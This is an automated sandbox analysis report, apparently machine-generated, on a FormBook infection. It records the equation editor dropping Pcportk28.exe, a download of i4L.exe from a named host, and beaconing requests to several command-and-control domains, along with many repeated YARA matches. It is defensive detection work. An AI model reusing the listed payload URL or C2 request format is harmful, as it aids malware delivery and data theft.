          Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htmJump to behavior
          Source: unknownDNS traffic detected: queries for: mikeloayza.com
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: mikeloayza.com
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mikeloayza.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1Host: www.fisioletsgo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1Host: www.bitcointradel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1Host: www.executive-air.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1Host: www.luckyfandom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_003562264_2_00356226
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_003543684_2_00354368
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00356C004_2_00356C00
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_003564794_2_00356479
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_003567204_2_00356720
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_003549684_2_00354968
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_003589904_2_00358990
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_003589804_2_00358980
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_009E11AB4_2_009E11AB
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041C0015_2_0041C001
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B8C35_2_0041B8C3
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041C9485_2_0041C948
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00408C805_2_00408C80
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041BD225_2_0041BD22
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00402D8A5_2_00402D8A
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085E0C65_2_0085E0C6
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0088D0055_2_0088D005
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008630405_2_00863040
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0087905A5_2_0087905A
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008DD06D5_2_008DD06D
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085E2E95_2_0085E2E9
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_009012385_2_00901238
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_009063BF5_2_009063BF
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085F3CF5_2_0085F3CF
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008863DB5_2_008863DB
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008623055_2_00862305
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008673535_2_00867353
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008AA37B5_2_008AA37B
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008954855_2_00895485
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008714895_2_00871489
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E443E5_2_008E443E
